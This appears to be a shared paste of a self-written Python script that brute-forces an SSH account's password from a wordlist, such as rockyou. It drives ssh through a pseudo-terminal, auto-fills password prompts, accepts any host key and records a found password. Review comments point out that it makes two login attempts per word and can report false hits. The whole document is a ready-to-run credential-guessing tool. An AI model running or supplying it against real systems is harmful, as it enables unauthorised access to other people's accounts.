metalni

[self_coded_script] dictionary_bruteforce.py

Oct 24th, 2021 (edited)
  1. # Script that runs a dictionary attack against a single user over SSH. You need a password dictionary; a popular one can be found by searching for 'rockyou dictionary'.
  2. # Start with python3 dictionary_bruteforce.py
  3.  
  4. import pty
  5. import os
  6. from os import waitpid, execv, read, write
  7.  
  class ssh():
      """Run one `/usr/bin/ssh` command under a pseudo-terminal and capture its output.

      The pty lets the parent process read ssh's interactive prompts and, when
      `askpass` is true, answer the password prompt and the unknown-host-key
      confirmation on the user's behalf.
      """

      def __init__(self, host, execute='echo "done" > ~/testing.txt',
                   askpass=False, user='victim', password=b'passwords'):
          """Store the connection settings and immediately call run().

          Args:
              host: Host name placed after the '@' in the ssh destination.
              execute: Command string handed to ssh as the remote command.
              askpass: When true, run() watches the pty for prompts and answers them.
              user: Account name placed before the '@' in the ssh destination.
              password: Bytes written to the pty when a password prompt is seen
                  (must be bytes: it is concatenated with b'\\n').
          """
          self.exec_ = execute
          self.host = host
          self.user = user
          self.password = password
          self.askpass = askpass
          # NOTE(review): constructing the object already performs one connection;
          # the value returned by run() is discarded here.
          self.run()

      def run(self):
          """Spawn ssh in a pty, answer prompts if enabled, and return its output.

          Returns:
              bytes: every chunk read after the prompt phase, each stripped of
              surrounding whitespace and then concatenated.
          """
          # argv for execv; no shell is involved, so each element is one argument.
          command = [
                  '/usr/bin/ssh',
                  self.user+'@'+self.host,
                  # ssh asks for the password once per invocation, then gives up.
                  '-o', 'NumberOfPasswordPrompts=1',
                  self.exec_,
          ]

          # Fork with the child attached to a new pseudo-terminal; the parent
          # talks to the child through child_fd.
          pid, child_fd = pty.fork()

          # pid == 0 in the child: replace the process image with ssh.
          if not pid:
              execv(command[0], command)

          # Prompt phase (parent only): read up to 1024 bytes at a time and react.
          while self.askpass:
              try:
                  output = read(child_fd, 1024).strip()
              except:
                  # A failing read ends the prompt phase. NOTE(review): the bare
                  # except also hides every other error, including KeyboardInterrupt.
                  break
              lower = output.lower()
              if b'password:' in lower:
                  # Send the single password and stop watching for prompts.
                  write(child_fd, self.password + b'\n')
                  break
              elif b'are you sure you want to continue connecting' in lower:
                  # NOTE(review): answering 'yes' accepts whatever host key the
                  # server presents, so the host's identity is not verified.
                  write(child_fd, b'yes\n')
              else:
                  # Anything else is reported and the loop keeps reading.
                  print('Error:', output)

          # Drain phase: collect output until read() raises (presumably when the
          # child side of the pty is closed - confirm on the target platform).
          output = []
          while True:
              try:
                  output.append(read(child_fd, 1024).strip())
              except:
                  break

          # Reap the child so it does not remain as a zombie.
          # NOTE(review): child_fd is not closed anywhere in this method.
          waitpid(pid, 0)
          return b''.join(output)
  54.  
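  if __name__ == "__main__":
      # Interactive inputs: the account to test and the wordlist file to read.
      user = input("Enter the username you want to crack: \n")
      dictionary_path = input("Enter relative path to passwords dictionary: \n")

      # The summary is appended with open() instead of `os.system('echo ... >> file')`:
      # wordlist lines are external data, and splicing them into a shell command
      # let any entry containing shell metacharacters run on the local machine.
      # '~' was previously expanded by the shell, so expand it explicitly here.
      output_file = os.path.expanduser('~/bruteforce_summary.txt')

      print("[*] Cracking Password For: " + user)

      is_found = False
      # The context manager closes the wordlist on every exit path.
      with open(dictionary_path, "r") as dictionary:
          for line in dictionary:
              # Drops the final character (normally the newline).
              # NOTE(review): a last line without a trailing newline loses a character.
              candidate = line[:-1]
              # NOTE(review): ssh.__init__ already calls run(), so the explicit run()
              # below is a second connection for the same candidate; the server
              # therefore sees two authentication attempts per wordlist entry.
              s = ssh("localhost", execute="ls ~/", askpass=True, user=user, password=candidate.encode())
              # NOTE(review): success is inferred only from the absence of
              # 'Permission denied', so any other failure is reported as a hit.
              if 'Permission denied' not in str(s.run()):
                  print("[+] Found Password: " + candidate + "\n")
                  is_found = True
                  with open(output_file, "a") as summary:
                      summary.write("[+] Found Password: " + candidate + "\n")
                  break

      if not is_found:
          with open(output_file, "a") as summary:
              summary.write("[-] Password Not Found\n")
          print("[-] Password Not Found.\n")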
  76.  